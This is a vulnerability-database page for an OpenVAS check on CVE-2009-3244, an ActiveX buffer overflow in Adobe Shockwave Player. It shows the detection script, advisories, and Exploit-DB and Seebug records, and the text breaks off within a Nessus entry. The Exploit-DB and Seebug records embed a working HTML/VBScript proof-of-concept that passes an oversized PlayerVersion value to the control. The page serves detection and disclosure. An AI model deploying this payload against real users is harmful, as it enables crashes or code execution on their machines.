Search...

Adobe Shockwave Player ActiveX Control BOF Vulnerability

2009-09-24T00:00:00

ID OPENVAS:900949
Type openvas
Reporter Copyright (C) 2009 SecPod
Modified 2017-07-05T00:00:00

Description

This host has Adobe Shockwave Player ActiveX Control installed and is prone to Buffer Overflow vulnerability.

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_adobe_shockwave_player_bof_vuln.nasl 6530 2017-07-05 06:23:50Z cfischer $
#
# Adobe Shockwave Player ActiveX Control BOF Vulnerability
#
# Authors:
# Nikita MR &lt;rnikita@secpod.com&gt;
#
# Updated the Fix.
# - Nikita MR &lt;rnikita@secpod.com&gt; 2009-11-06
#
# Copyright:
# Copyright (c) 2009 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_impact = "Successful attack could allow attackers to execute arbitrary code and to
  cause denial of service.
  Impact Level: Application";
tag_affected = "Adobe Shockwave Player 11.5.1.601 and prior on Windows.";
tag_insight = "An error occurs in the ActiveX Control (SwDir.dll) while processing malicious
  user supplied data containig a long PlayerVersion property value.";
tag_solution = "Upgrade to Adobe Shockwave Player 11.5.2.602
  http://get.adobe.com/shockwave/otherversions/";
tag_summary = "This host has Adobe Shockwave Player ActiveX Control installed
  and is prone to Buffer Overflow vulnerability.";

if(description)
{
  script_id(900949);
  script_version("$Revision: 6530 $");
  script_tag(name:"last_modification", value:"$Date: 2017-07-05 08:23:50 +0200 (Wed, 05 Jul 2017) $");
  script_tag(name:"creation_date", value:"2009-09-24 10:05:51 +0200 (Thu, 24 Sep 2009)");
  script_tag(name:"cvss_base", value:"9.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_cve_id("CVE-2009-3244");
  script_bugtraq_id(36434, 36905);
  script_name("Adobe Shockwave Player ActiveX Control BOF Vulnerability");
  script_xref(name : "URL" , value : "http://www.milw0rm.com/exploits/9682");

  script_category(ACT_GATHER_INFO);
  script_tag(name:"qod_type", value:"executable_version");
  script_copyright("Copyright (C) 2009 SecPod");
  script_family("Buffer overflow");
  script_dependencies("secpod_adobe_shockwave_player_detect.nasl");
  script_mandatory_keys("Adobe/ShockwavePlayer/Ver");
  script_require_ports(139, 445);
  script_tag(name : "impact" , value : tag_impact);
  script_tag(name : "affected" , value : tag_affected);
  script_tag(name : "insight" , value : tag_insight);
  script_tag(name : "solution" , value : tag_solution);
  script_tag(name : "summary" , value : tag_summary);
  exit(0);
}


include("smb_nt.inc");
include("version_func.inc");
include("secpod_activex.inc");
include("secpod_smb_func.inc");

shockVer = get_kb_item("Adobe/ShockwavePlayer/Ver");
if(!shockVer){
  exit(0);
}

# Grep for version 11.5.1.601 and prior.
if(version_is_less_equal(version:shockVer, test_version:"11.5.1.601"))
{
  dllPath = registry_get_sz(key:"SOFTWARE\Microsoft\COM3\Setup",
                           item:"Install Path");
  if(dllPath == NULL){
    exit(0);
  }

  share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:dllPath);
  file  = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1",  string:dllPath +
                               "\Adobe\Director\SwDir.dll");

  dllOpn = open_file(share:share, file:file);
  if(isnull(dllOpn))
  {
    file  = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1",  string:dllPath +
                                              "\Macromed\Director\SwDir.dll");
    dllOpn = open_file(share:share, file:file);
  }

  if(dllOpn &&
     is_killbit_set(clsid:"{233C1507-6A77-46A4-9443-F871F945D258}") == 0){
    security_message(0);
  }
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:900949", "type": "openvas", "bulletinFamily": "scanner", "title": "Adobe Shockwave Player ActiveX Control BOF Vulnerability", "description": "This host has Adobe Shockwave Player ActiveX Control installed\n and is prone to Buffer Overflow vulnerability.", "published": "2009-09-24T00:00:00", "modified": "2017-07-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=900949", "reporter": "Copyright (C) 2009 SecPod", "references": ["http://www.milw0rm.com/exploits/9682"], "cvelist": ["CVE-2009-3244"], "lastseen": "2017-07-20T08:55:43", "viewCount": 1, "enchantments": {"score": {"value": 9.7, "vector": "NONE", "modified": "2017-07-20T08:55:43", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3244"]}, {"type": "seebug", "idList": ["SSV:12380"]}, {"type": "exploitdb", "idList": ["EDB-ID:10093", "EDB-ID:9682"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900949"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10374", "SECURITYVULNS:DOC:22742"]}, {"type": "nessus", "idList": ["MACOSX_SHOCKWAVE_PLAYER_APSB09_16.NASL", "SHOCKWAVE_PLAYER_APSB09_16.NASL"]}], "modified": "2017-07-20T08:55:43", "rev": 2}, "vulnersScore": 9.7}, "pluginID": "900949", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_adobe_shockwave_player_bof_vuln.nasl 6530 2017-07-05 06:23:50Z cfischer $\n#\n# Adobe Shockwave Player ActiveX Control BOF Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Updated the Fix.\n# - Nikita MR <rnikita@secpod.com> 2009-11-06\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful attack could allow attackers to execute arbitrary code and to\n cause denial of service.\n Impact Level: Application\";\ntag_affected = \"Adobe Shockwave Player 11.5.1.601 and prior on Windows.\";\ntag_insight = \"An error occurs in the ActiveX Control (SwDir.dll) while processing malicious\n user supplied data containig a long PlayerVersion property value.\";\ntag_solution = \"Upgrade to Adobe Shockwave Player 11.5.2.602\n http://get.adobe.com/shockwave/otherversions/\";\ntag_summary = \"This host has Adobe Shockwave Player ActiveX Control installed\n and is prone to Buffer Overflow vulnerability.\";\n\nif(description)\n{\n script_id(900949);\n script_version(\"$Revision: 6530 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-05 08:23:50 +0200 (Wed, 05 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-24 10:05:51 +0200 (Thu, 24 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3244\");\n script_bugtraq_id(36434, 36905);\n script_name(\"Adobe Shockwave Player ActiveX Control BOF Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/9682\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_adobe_shockwave_player_detect.nasl\");\n script_mandatory_keys(\"Adobe/ShockwavePlayer/Ver\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_activex.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nshockVer = get_kb_item(\"Adobe/ShockwavePlayer/Ver\");\nif(!shockVer){\n exit(0);\n}\n\n# Grep for version 11.5.1.601 and prior.\nif(version_is_less_equal(version:shockVer, test_version:\"11.5.1.601\"))\n{\n dllPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\COM3\\Setup\",\n item:\"Install Path\");\n if(dllPath == NULL){\n exit(0);\n }\n\n share = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:dllPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:dllPath +\n \"\\Adobe\\Director\\SwDir.dll\");\n\n dllOpn = open_file(share:share, file:file);\n if(isnull(dllOpn))\n {\n file = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:dllPath +\n \"\\Macromed\\Director\\SwDir.dll\");\n dllOpn = open_file(share:share, file:file);\n }\n\n if(dllOpn &&\n is_killbit_set(clsid:\"{233C1507-6A77-46A4-9443-F871F945D258}\") == 0){\n security_message(0);\n }\n}\n", "naslFamily": "Buffer overflow", "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T05:40:05", "description": "Heap-based buffer overflow in the SwDir.dll ActiveX control in Adobe Shockwave Player 11.5.1.601 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long PlayerVersion property value.", "edition": 8, "cvss3": {}, "published": "2009-09-18T10:30:00", "title": "CVE-2009-3244", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3244"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:adobe:shockwave_player:8.5.1.105", "cpe:/a:adobe:shockwave_player:8.0.205", "cpe:/a:adobe:shockwave_player:8.5.1", "cpe:/a:adobe:shockwave_player:11.0.0.456", "cpe:/a:adobe:shockwave_player:8.5.325", "cpe:/a:adobe:shockwave_player:11.5.1.601", "cpe:/a:adobe:shockwave_player:8.5.321", "cpe:/a:adobe:shockwave_player:8.5.1.100", "cpe:/a:adobe:shockwave_player:11.5.2.602", "cpe:/a:adobe:shockwave_player:8.0.196a", "cpe:/a:adobe:shockwave_player:8.5.324", "cpe:/a:adobe:shockwave_player:11.5.6.606", "cpe:/a:adobe:shockwave_player:1.0", "cpe:/a:adobe:shockwave_player:11.5.0.595", "cpe:/a:adobe:shockwave_player:11.5.8.612", "cpe:/a:adobe:shockwave_player:3.0", "cpe:/a:adobe:shockwave_player:10.2.0.021", "cpe:/a:adobe:shockwave_player:9", "cpe:/a:adobe:shockwave_player:8.5.323", "cpe:/a:adobe:shockwave_player:4.0", "cpe:/a:adobe:shockwave_player:8.0.204", "cpe:/a:adobe:shockwave_player:10.1.0.11", "cpe:/a:adobe:shockwave_player:10.0.0.210", "cpe:/a:adobe:shockwave_player:10.1.0.011", "cpe:/a:adobe:shockwave_player:8.0", "cpe:/a:adobe:shockwave_player:10.0.1.004", "cpe:/a:adobe:shockwave_player:10.1.4.020", "cpe:/a:adobe:shockwave_player:8.0.196", "cpe:/a:adobe:shockwave_player:6.0", "cpe:/a:adobe:shockwave_player:10.1.1.016", "cpe:/a:adobe:shockwave_player:8.5.1.103", "cpe:/a:adobe:shockwave_player:11.0.3.471", "cpe:/a:adobe:shockwave_player:10.2.0.022", "cpe:/a:adobe:shockwave_player:2.0", "cpe:/a:adobe:shockwave_player:11.5.7.609", "cpe:/a:adobe:shockwave_player:5.0", "cpe:/a:adobe:shockwave_player:10.2.0.023", "cpe:/a:adobe:shockwave_player:9.0.383", "cpe:/a:adobe:shockwave_player:11.5.0.596", "cpe:/a:adobe:shockwave_player:8.5.1.106", "cpe:/a:adobe:shockwave_player:9.0.432"], "id": "CVE-2009-3244", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3244", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:shockwave_player:11.5.0.595:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:10.2.0.022:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:8.5.1.105:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:8.5.1.100:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:10.1.4.020:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:11.5.2.602:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:10.1.1.016:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:8.0.196:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:8.5.323:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:11.5.0.596:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:8.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:9:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:11.0.3.471:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:11.5.6.606:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:11.5.7.609:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:10.0.0.210:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:8.5.1.103:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:8.5.325:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:11.5.8.612:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:11.5.1.601:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:11.0.0.456:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:9.0.383:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:8.0.196a:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:8.5.1.106:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:10.2.0.021:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:10.0.1.004:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:10.1.0.011:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:8.5.324:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:9.0.432:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:8.5.321:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:10.1.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:10.2.0.023:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:8.0.204:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:shockwave_player:8.0.205:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:40:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3244"], "description": "This host has Adobe Shockwave Player ActiveX Control installed\n and is prone to Buffer Overflow vulnerability.", "modified": "2018-11-30T00:00:00", "published": "2009-09-24T00:00:00", "id": "OPENVAS:1361412562310900949", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900949", "type": "openvas", "title": "Adobe Shockwave Player ActiveX Control BOF Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_adobe_shockwave_player_bof_vuln.nasl 12602 2018-11-30 14:36:58Z cfischer $\n#\n# Adobe Shockwave Player ActiveX Control BOF Vulnerability\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Updated the Fix.\n# - Nikita MR <rnikita@secpod.com> 2009-11-06\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900949\");\n script_version(\"$Revision: 12602 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-30 15:36:58 +0100 (Fri, 30 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-24 10:05:51 +0200 (Thu, 24 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3244\");\n script_bugtraq_id(36434, 36905);\n script_name(\"Adobe Shockwave Player ActiveX Control BOF Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/9682\");\n script_xref(name:\"URL\", value:\"http://get.adobe.com/shockwave/otherversions/\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_adobe_shockwave_player_detect.nasl\");\n script_mandatory_keys(\"Adobe/ShockwavePlayer/Ver\");\n script_require_ports(139, 445);\n\n script_tag(name:\"impact\", value:\"Successful attack could allow attackers to execute arbitrary code and to\n cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"Adobe Shockwave Player 11.5.1.601 and prior on Windows.\");\n\n script_tag(name:\"insight\", value:\"An error occurs in the ActiveX Control (SwDir.dll) while processing malicious\n user supplied data containing a long PlayerVersion property value.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Shockwave Player 11.5.2.602.\");\n\n script_tag(name:\"summary\", value:\"This host has Adobe Shockwave Player ActiveX Control installed\n and is prone to Buffer Overflow vulnerability.\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_activex.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nshockVer = get_kb_item(\"Adobe/ShockwavePlayer/Ver\");\nif(!shockVer){\n exit(0);\n}\n\nif(version_is_less_equal(version:shockVer, test_version:\"11.5.1.601\"))\n{\n dllPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\COM3\\Setup\",\n item:\"Install Path\");\n if(dllPath == NULL){\n exit(0);\n }\n\n share = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:dllPath);\n file = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:dllPath +\n \"\\Adobe\\Director\\SwDir.dll\");\n\n dllOpn = open_file(share:share, file:file);\n if(isnull(dllOpn))\n {\n file = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:dllPath +\n \"\\Macromed\\Director\\SwDir.dll\");\n dllOpn = open_file(share:share, file:file);\n }\n\n if(dllOpn &&\n is_killbit_set(clsid:\"{233C1507-6A77-46A4-9443-F871F945D258}\") == 0){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-01T11:08:19", "description": "Adobe ShockWave Player 11.5.1.601 ActiveX Buffer Overflow PoC. CVE-2009-3244. Dos exploit for windows platform", "published": "2009-09-15T00:00:00", "type": "exploitdb", "title": "Adobe ShockWave Player 11.5.1.601 - ActiveX Buffer Overflow PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3244"], "modified": "2009-09-15T00:00:00", "id": "EDB-ID:9682", "href": "https://www.exploit-db.com/exploits/9682/", "sourceData": "#####################################################################################\n\nApplication: Adobe ShockWave Player (11.5.1.601)\n \nPlatforms: Windows XP Professional French SP2 and SP3\n\ncrash:\t IE 6.0.2900.2180\n\t\nExploitation: remote DoS\n\nDate: 2009-08-24\n\nAuthor: Francis Provencher (Protek Research Lab's)\n \n\n#####################################################################################\n\n1) Introduction\n2) Technical details and bug\n3) The Code\n\n#####################################################################################\n\n===============\n1) Introduction\n===============\n\nOver 450 million Internet-enabled desktops have installed Adobe Shockwave Player.\nThese people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment,\ninteractive product demonstrations, and online learning applications. Shockwave Player displays Web content that has been created by Adobe Director.\n\n#####################################################################################\n\n============================\n2) Technical details \n============================\n\nName:\tSwDir.dll\nVer.:\t11.5.1.601\nCLSID:\t{233C1507-6A77-46A4-9443-F871F945D258}\n\n\n(d40.b20): Stack overflow - code c00000fd \neax=00305004 ebx=00000003 ecx=00032f80 edx=00400000 esi=09ae0024 edi=00400002\neip=69214965 esp=0012df78 ebp=0012df8c iopl=0 nv up ei pl nz na po nc\ncs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202\n\n\n\n#####################################################################################\n\n# milw0rm.com [2009-09-15]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9682/"}, {"lastseen": "2016-02-01T11:55:02", "description": "Adobe Shockwave 11.5.1.601 Player Multiple Code Execution Vulnerability. CVE-2009-3244. Remote exploits for multiple platform", "published": "2009-11-04T00:00:00", "type": "exploitdb", "title": "Adobe Shockwave 11.5.1.601 Player Multiple Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3244"], "modified": "2009-11-04T00:00:00", "id": "EDB-ID:10093", "href": "https://www.exploit-db.com/exploits/10093/", "sourceData": "<html>\r\n\r\n<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>\r\n<script language='vbscript'>\r\n\r\nargCount = 1\r\n\r\narg1=String(2097152, \"A\")\r\n\r\nShockW.PlayerVersion = arg1\r\n\r\n</script>\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/10093/"}], "seebug": [{"lastseen": "2017-11-19T18:35:38", "description": "CVE ID: CVE-2009-3244\r\n\r\nAdobe Shockwave Player\u662f\u4e13\u95e8\u64ad\u653e\u4f7f\u7528Director Shockwave Studio\u5236\u4f5c\u7684\u7f51\u9875\u7684\u5916\u6302\u8f6f\u4ef6\u3002\r\n\r\nShockwave Player\u6240\u63d0\u4f9b\u7684SwDir.dll ActiveX\u63a7\u4ef6\u5728\u64ad\u653e\u6076\u610f\u7f51\u9875\u6587\u4ef6\u65f6\u5b58\u5728\u5806\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u7528\u6237\u53d7\u9a97\u6253\u5f00\u4e86\u5305\u542b\u6709\u8d85\u957fPlayerVersion\u5c5e\u6027\u503c\u7684HTML\u6587\u4ef6\u65f6\u5c31\u53ef\u80fd\u89e6\u53d1\u8fd9\u4e2a\u6ea2\u51fa\uff0c\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6216\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n\nAdobe Shockwave Player 11.5.1.601\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u4e3aCLSID {233C1507-6A77-46A4-9443-F871F945D258}\u8bbe\u7f6ekill-bit\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nAdobe\r\n-----\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.adobe.com", "published": "2009-09-22T00:00:00", "title": "Adobe ShockWave Player SwDir.dll\u63a7\u4ef6\u5806\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3244"], "modified": "2009-09-22T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12380", "id": "SSV:12380", "sourceData": "\n <html>\r\n<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>\r\n<script language='vbscript'>\r\nargCount = 1\r\narg1=String(2097152, "A")\r\nShockW.PlayerVersion = arg1\r\n</script>\r\n\r\nhttp://sebug.net/exploit/12322/\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12380"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-3466", "CVE-2009-3464", "CVE-2009-3463", "CVE-2009-3244", "CVE-2009-3465"], "description": "Security updates available for Shockwave Player\r\n\r\nRelease date: November 3, 2009\r\n\r\nVulnerability identifier: APSB09-16\r\n\r\nCVE number: CVE-2009-3244, CVE-2009-3463, CVE-2009-3464, CVE-2009-3465, CVE-2009-3466\r\n\r\nPlatform: Windows and Macintosh\r\nSummary\r\n\r\nCritical vulnerabilities have been identified in Adobe Shockwave Player 11.5.1.601 and earlier versions. The vulnerabilities could allow an attacker, who successfully exploits the vulnerabilities, to run malicious code on the affected system. Adobe has provided a solution for the reported vulnerabilities. It is recommended that users update their installations using the instructions provided below.\r\nAffected software versions\r\n\r\nShockwave Player 11.5.1.601 and earlier versions\r\nSolution\r\n\r\nAdobe recommends Shockwave Player users install Shockwave Player version 11.5.2.602 available here: http://get.adobe.com/shockwave/.\r\nSeverity rating\r\n\r\nAdobe categorizes this as a critical update and recommends that users apply the update for their product installations.\r\nDetails\r\n\r\nCritical vulnerabilities have been identified in Adobe Shockwave Player 11.5.1.601 and earlier versions. The vulnerabilities could allow an attacker, who successfully exploits the vulnerabilities, to run malicious code on the affected system. Adobe has provided a solution for the reported vulnerabilities.\r\n\r\nThis update resolves an invalid index vulnerability that could potentially lead to code execution (CVE-2009-3463).\r\n\r\nThis update resolves invalid pointer vulnerabilities that could potentially lead to code execution (CVE-2009-3464, CVE-2009-3465).\r\n\r\nThis update resolves an invalid string length vulnerability that could potentially lead to code execution (CVE-2009-3466).\r\n\r\nThis update resolves a boundary condition issue that could lead to a Denial of Service (DoS) issue (CVE-2009-3244).\r\nAcknowledgments\r\n\r\nAdobe would like to thank the following individuals and organizations for reporting the relevant issues and for working with Adobe to help protect our customers' security:\r\n\r\n * Nicolas Joly of VUPEN Security (CVE-2009-3463, CVE-2009-3464, CVE-2009-3465, CVE-2009-3466)\r\n", "edition": 1, "modified": "2009-11-05T00:00:00", "published": "2009-11-05T00:00:00", "id": "SECURITYVULNS:DOC:22742", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22742", "title": "Security updates available for Shockwave Player", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-3466", "CVE-2009-3464", "CVE-2009-3463", "CVE-2009-3244", "CVE-2009-3465"], "description": "Multiple vulnerabilities lead to code executions.", "edition": 1, "modified": "2009-11-05T00:00:00", "published": "2009-11-05T00:00:00", "id": "SECURITYVULNS:VULN:10374", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10374", "title": "Adobe Shockwave Player Multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-04-01T03:57:15", "description": "The remote Mac OS X host contains a version of Adobe Shockwave Player\nthat is 11.5.1.601 or earlier. It is, 